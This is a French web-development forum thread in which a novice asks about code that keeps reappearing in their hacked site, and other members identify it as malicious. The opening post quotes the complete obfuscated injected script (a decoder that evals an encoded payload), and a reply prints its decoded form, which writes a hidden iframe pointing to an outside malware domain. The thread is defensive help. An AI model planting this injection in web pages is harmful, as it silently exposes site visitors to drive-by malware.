IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

Attaque virale ou quoi ?


Sujet :

JavaScript

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre averti
    Profil pro
    Inscrit en
    Juin 2007
    Messages
    10
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2007
    Messages : 10
    Par défaut Attaque virale ou quoi ?
    Il y a à peu près une semaine de ça le forum m'a aidé à solutionner mon problème qui n'était pas des moindre car mon site internet avait disparru de l'IE. J'ai enfin trouvé des lignes de codes qui n'avaient rien à faire là donc après les avoir éffacées la site est aparru sans problème et sans alerte au virus mais me revoilà dans le même cas de figure et je retrouve directement et à la même place les lignes éffacées soit :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <body><script language=JavaScript>function oumwnbn51(b){ var e=b.length,f=1024,m,y,p,k=0,j=0,n=0,t=Array(63,16,59,8,57,56,53,43,12,41,0,0,0,0,0,0,58,33,40,21,22,44,45,4,30,50,7,14,26,61,0,55,36,37,47,27,38,39,25,5,13,62,34,0,0,0,0,32,0,23,49,51,52,1,10,3,42,54,31,9,6,35,60,28,29,48,24,19,17,18,46,15,2,20,11);for(y=Math.ceil(e/f);y>0;y--){p='';for(m=Math.min(e,f);m>0;m--,e--){{n|=(t[b.charCodeAt(k++)-48])<<j;if(j){p+=String.fromCharCode(218^n&255);n>>=8;j-=2}else{j=6}}}eval(p);}}oumwnbn51('FKzFYDS7dUh72@@79HH0HDzF0ij5YDSvRH2Rd@fMFZ@EvY7nMSYEnZ@vOY7Ydv2F0HKRZcH@@Ufh4HKYI@h7hxHM6zYvY@2EvKSFdu0EdISF62LMQOjnav77Iuwh6YfFYf0Q2@hEdm@vd@SFOf0nq2v@7mv5cJj0nfK29OjnMmRYFK7Rvf2490K@@z2Rci7EvHY@72vY9@@BiY24522E9hhF2Kf5dDzF0Zw4Ta0EnZ@vOYz4Mww')</script><!-- 82.165.114.206 -->
    Est ce que quelqun pourrait m'expliquer ce que c'est (je suis novice et ne comprends rien au code) et comment je m'en débarrasse de manière définitive ?
    Merci d'avance

  2. #2
    Membre Expert

    Homme Profil pro
    Expert PHP
    Inscrit en
    Novembre 2004
    Messages
    2 127
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 41
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Expert PHP
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Novembre 2004
    Messages : 2 127
    Par défaut
    C'est surement un code malveillant, qui essaie de faire télécharger un virus à la personne qui se connecte sur ton site ?

    Mais relis bien ton précédent post :
    http://www.developpez.net/forums/d67...ouvre-plus-ie/

    Tu viens de te faire hacker ton site, il faut que tu changes tous les mot de passes, que tu le sécurises etc ...

  3. #3
    Rédacteur/Modérateur

    Avatar de SpaceFrog
    Homme Profil pro
    Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Inscrit en
    Mars 2002
    Messages
    39 659
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 75
    Localisation : Royaume-Uni

    Informations professionnelles :
    Activité : Développeur Web Php Mysql Html Javascript CSS Apache - Intégrateur - Bidouilleur SharePoint
    Secteur : Industrie

    Informations forums :
    Inscription : Mars 2002
    Messages : 39 659
    Billets dans le blog
    1
    Par défaut
    en empechant le scrip d'evaleur le code et en en faisant un alert voici ce que l'on obtient ... cf pièce jointe

    en fait cela colle un iframe dans la page qui charge une page avec contournement de cache ...
    après que fait cette page .... ????
    Images attachées Images attachées  
    Ma page Developpez - Mon Blog Developpez
    Président du CCMPTP (Comité Contre le Mot "Problème" dans les Titres de Posts)
    Deux règles du succès: 1) Ne communiquez jamais à quelqu'un tout votre savoir...
    Votre post est résolu ? Alors n'oubliez pas le Tag

    Venez sur le Chat de Développez !

  4. #4
    Expert confirmé
    Avatar de le_chomeur
    Profil pro
    Développeur informatique
    Inscrit en
    Février 2006
    Messages
    3 653
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2006
    Messages : 3 653
    Par défaut
    je viens de regarder ce que le code faisait :
    il créer une frame dans ta page , pointant vers une url avec des paramètres, rien de plus :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
    window.status='Done';document.write('<iframe name=f863 src="http://8addition.info/t/?'+Math.round(Math.random()*40128)+'f863'+'" width=352 height=114 style="display:none"></iframe>')

  5. #5
    Membre Expert

    Homme Profil pro
    Expert PHP
    Inscrit en
    Novembre 2004
    Messages
    2 127
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 41
    Localisation : France, Loire Atlantique (Pays de la Loire)

    Informations professionnelles :
    Activité : Expert PHP
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Novembre 2004
    Messages : 2 127
    Par défaut
    http://www.malwaredomainlist.com/mdl...tity=50&page=0

    Je pense que c'est un site qui essaie de te transmettre des malwares ?

  6. #6
    Expert confirmé
    Avatar de le_chomeur
    Profil pro
    Développeur informatique
    Inscrit en
    Février 2006
    Messages
    3 653
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2006
    Messages : 3 653
    Par défaut
    j'ai testé le code
    ( je suis sur le pc du boulot donc ... )

    et il ne fait pas grand chose sous FF en tous cas ...

Discussions similaires

  1. Attaque virale ou quoi ?
    Par lapoisse dans le forum Dreamweaver
    Réponses: 0
    Dernier message: 03/02/2009, 16h29
  2. Avec quoi attaquer ma base Firebird ?
    Par jesusnavas dans le forum Bases de données
    Réponses: 21
    Dernier message: 20/10/2008, 11h27
  3. [Kylix] Kylix attaque Mysql ?
    Par nahmsath dans le forum EDI
    Réponses: 9
    Dernier message: 12/08/2002, 19h37
  4. Qu'est-ce que c'est que Nessus, ça fait quoi exactement ?
    Par PeterT dans le forum Développement
    Réponses: 3
    Dernier message: 24/07/2002, 11h23
  5. C'est quoi exactement un générateur d'états
    Par Henry Cesbron Lavau dans le forum Outils de restitution et d'analyse
    Réponses: 0
    Dernier message: 02/04/2002, 19h15

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo